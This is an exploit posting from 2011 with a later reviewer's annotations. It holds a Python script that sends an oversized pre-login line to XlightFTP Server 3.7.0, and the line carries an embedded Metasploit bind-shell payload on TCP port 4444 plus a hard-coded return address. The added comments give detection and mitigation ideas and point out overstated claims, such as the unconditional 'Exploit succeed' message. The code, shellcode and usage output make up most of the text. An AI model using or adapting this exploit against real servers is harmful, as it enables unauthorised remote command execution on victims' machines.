XlightFTP Server 3.7.0 Buffer Overflow
Posted on 19 August 2011
# Source banner (ASCII art was destroyed by extraction; text kept):
# >> Exploit database separated by exploit type (local, remote, DoS, etc.)
# [+] Site : 1337day.com
# [+] Support e-mail : submit[at]1337day.com
# I'm KedAns-Dz member from Inj3ct0r Team
###
# Title : XlightFTP Server v3.7.0 Remote Root BOF Exploit
# Author : KedAns-Dz
# E-mail : ked-h@hotmail.com (ked-h@1337day.com) | ked-h@exploit-id.com | kedans@facebook.com
# Home : Hassi.Messaoud (30008) - Algeria -(00213555248701)
# Web Site : www.1337day.com * www.exploit-id.com * www.dis9.com
# Facebook : http://facebook.com/KedAns
# platform : windows
# Impact : Remote Root Exploit & Buffer Overflow (in version 3.7.0)
# Tested on : Windows XP SP3 (Fr)
##
# [Indoushka & SeeMe] => Welcome back Br0ther's <3 ^^ <3
##
# | >> --------+++=[ Dz Offenders Cr3w ]=+++------- << |
# | > Indoushka * KedAns-Dz * Caddy-Dz * Kalashinkov3 |
# | Jago-dz * Over-X * Kha&miX * Ev!LsCr!pT_Dz * T0xic |
# | ------------------------------------------------ < |
# + All Dz .. This is Open Group 4 L33T Dz Hax3rZ ..
###
#
# NOTE(review): how to read this listing
#
# What the script does, as written: it opens one TCP connection to the host
# and port given on the command line, reads up to 1024 bytes from the server,
# waits, sends one long buffer terminated by "x0a", reads a reply and closes.
# No USER/PASS or any other FTP verb is sent, so the listing implies the
# overflow is reached before authentication. It does not say which parser or
# buffer is affected -- confirm against the vendor advisory.
#
# Fidelity: every byte escape appears as "xNN" without a backslash, so the
# string literals below are plain ASCII text, not the bytes the comments
# describe. Presumably the escapes were lost when the page was rendered; do
# not derive byte-exact signatures from this copy.
#
# Claims to treat with care:
#   * "Remote Root": the stated platform is Windows; code reached through a
#     service overflow would presumably run with the privileges of the
#     account the FTP service runs under.
#   * "Universal" return address: a fixed address inside a system DLL depends
#     on the exact OS build and language, and the author reports one test
#     system (Windows XP SP3, French).
#   * "Exploit succeed" is printed unconditionally; nothing inspects the
#     reply or checks the listener, so the message is not evidence of impact.
#
# Detection and mitigation ideas:
#   * FTP commands are short. A control-channel line of this size (about
#     1.8 KB if each xNN stood for one byte: 1337 + 123 + 368 + 8 + 4 + 1)
#     arriving before login is a strong anomaly; cap or alert on line length.
#   * Watch for the FTP service process opening a new listening socket (the
#     payload comment states TCP 4444) or spawning a command interpreter.
#   * Move off 3.7.0 to a vendor-fixed release (<fixed version -- not stated
#     on this page>), run the service under a low-privilege account, enable
#     DEP/ASLR where the platform offers them, and limit who can reach the
#     control port.
#
#----------------[ Exploit Code ]----------=>
#!/usr/bin/python
# Python 2 syntax throughout (print statements).
from socket import *  # only socket, AF_INET and SOCK_STREAM are used below
import sys, struct, os, time  # struct and os are not used in this listing
print " XlightFTP Server v3.7.0 Remote Root BOF Exploit"
# Require <host> and <port>; otherwise print usage and stop.
if (len(sys.argv) < 3):
    print " XlightFTP Server v3.7.0 Remote Root BOF Exploit"
    print " Usage: %s <host> <port> " %(sys.argv[0])
    sys.exit()
print " [!] Connecting to %s ..." %(sys.argv[1])
# connect to host
sock = socket(AF_INET,SOCK_STREAM)
sock.connect((sys.argv[1],int(sys.argv[2])))
# Read and discard up to 1024 bytes (presumably the server greeting); the
# content is never examined, so the target's product/version is not checked.
sock.recv(1024)
time.sleep(5)
#-------------------------------------------
# Buffer layout, in order: filler, padding, payload, padding, 4-byte value,
# line terminator. The offsets are hard-coded for the author's test system.
buffer = "x41" * 1337 # Junk
buffer += "x90" * 123 # padding
#-------------------------------------------
# windows/shell_bind_tcp - 368 bytes
# Encoder: x86/shikata_ga_nai (http://www.metasploit.com)
# LPORT=4444, RHOST=192.168.1.2, EXITFUNC=process
# NOTE(review): per the comment above this is a generated bind-shell payload,
# i.e. the indicator on a host is a new listener on TCP 4444. The bytes are
# encoder output and not a stable signature.
buffer += ("x33xc9xbfxb8xf7xfdxd9xdaxd8xd9x74x24xf4xb1"+
"x56x5dx83xc5x04x31x7dx0dx03x7dxb5x15x08x25"+
"x2dx50xf3xd6xadx03x7dx33x9cx11x19x37x8cxa5"+
"x69x15x3cx4dx3fx8exb7x23xe8xa1x70x89xcex8c"+
"x81x3fxcfx43x41x21xb3x99x95x81x8ax51xe8xc0"+
"xcbx8cx02x90x84xdbxb0x05xa0x9ex08x27x66x95"+
"x30x5fx03x6axc4xd5x0axbbx74x61x44x23xffx2d"+
"x75x52x2cx2ex49x1dx59x85x39x9cx8bxd7xc2xae"+
"xf3xb4xfcx1exfexc5x39x98xe0xb3x31xdax9dxc3"+
"x81xa0x79x41x14x02x0axf1xfcxb2xdfx64x76xb8"+
"x94xe3xd0xddx2bx27x6bxd9xa0xc6xbcx6bxf2xec"+
"x18x37xa1x8dx39x9dx04xb1x5ax79xf9x17x10x68"+
"xeex2ex7bxe5xc3x1cx84xf5x4bx16xf7xc7xd4x8c"+
"x9fx6bx9dx0ax67x8bxb4xebxf7x72x36x0cxd1xb0"+
"x62x5cx49x10x0ax37x89x9dxdfx98xd9x31x8fx58"+
"x8axf1x7fx31xc0xfdxa0x21xebxd7xd7x65x25x03"+
"xb4x01x44xb3x2bx8exc1x55x21x3ex84xcexddxfc"+
"xf3xc6x7axfexd1x7axd3x68x6dx95xe3x97x6exb3"+
"x40x3bxc6x54x12x57xd3x45x25x72x73x0fx1ex15"+
"x09x61xedx87x0exa8x85x24x9cx37x55x22xbdxef"+
"x02x63x73xe6xc6x99x2ax50xf4x63xaax9bxbcxbf"+
"x0fx25x3dx4dx2bx01x2dx8bxb4x0dx19x43xe3xdb"+
"xf7x25x5dxaaxa1xffx32x64x25x79x79xb7x33x86"+
"x54x41xdbx37x01x14xe4xf8xc5x90x9dxe4x75x5e"+
"x74xadx86x15xd4x84x0exf0x8dx94x52x03x78xda"+
"x6ax80x88xa3x88x98xf9xa6xd5x1ex12xdbx46xcb"+
"x14x48x66xde")
#-------------------------------------
buffer += "x90" * 8 # more nop's
#-------------------------------------
# NOTE(review): the author labels the next value as an address in a system
# DLL; presumably it is meant to replace a saved return address. It is
# specific to the tested build despite the "Universal" label.
buffer += "x07xd5xc5x7c" # jmp esp in shell32.dll (Windows XP SP3 - Universal)
buffer += "x0a" # end connection
# send buffer
print "[*] Sending Buffer Junk..."
time.sleep(2)
print "[*] Spawn a Backshell Connecting..."
sock.send(buffer)
# The reply is read and discarded; no result is evaluated before the
# success message below is printed.
sock.recv(1024)
sock.close()
print "[+] Exploit succeed. Now NetCat %s on port 4444 " %(sys.argv[1])
print " > Exploit By : KedAns-Dz - Dz Offenders Cr3w - Inj3ct0r Team"
sys.exit()
#-------------------[ End ]----------------<<
# | >> --------+++=[ Dz Offenders Cr3w ]=+++------- << |
# | > Indoushka * KedAns-Dz * Caddy-Dz * Kalashinkov3 |
# | Jago-dz * Over-X * Kha&miX * Ev!LsCr!pT_Dz * T0xic |
# | ------------------------------------------------ < |
#================[ Exploited By KedAns-Dz * Inj3ct0r * ]=========================================
# Greets To : Dz Offenders Cr3w < Algerians HaCkerS > + Rizky Ariestiyansyah * HMD 1850 BBs (all)
# + Greets To Inj3ct0r Operators Team : r0073r * Sid3^effectS * r4dc0re (www.1337day.com)
# Inj3ct0r Members 31337 : Indoushka * KnocKout * eXeSoul * eidelweiss * SeeMe * XroGuE * ZoRLu
# gunslinger_ * Sn!pEr.S!Te * anT!-Tr0J4n * ^Xecuti0N3r * Kalashinkov3 (www.1337day.com/team)
# Exploit-ID Team : jos_ali_joe + Caddy-Dz + kaMtiEz + r3m1ck (exploit-id.com) * Jago-dz * Over-X
# Kha&miX * Str0ke * JF * Ev!LsCr!pT_Dz * T0xic * www.packetstormsecurity.org * TreX (hotturks.org)
# www.metasploit.com * Underground Exploitation (www.dis9.com) * All Security and Exploits Webs ..
# -+-+-+-+-+-+-+-+-+-+-+-+={ Greetings to Friendly Teams : }=+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-
# (D) HaCkerS-StreeT-Team (Z) | Inj3ct0r | Exploit-ID | UE-Team | PaCket.Storm.Sec TM | Sec4Ever
# h4x0re-Sec | Dz-Ghost | INDONESIAN CODER | HotTurks | IndiShell | D.N.A | DZ Team | Milw0rm
# Indian Cyber Army | MetaSploit | BaCk-TraCk | AutoSec.Tools | HighTech.Bridge SA | Team DoS-Dz
#================================================================================================
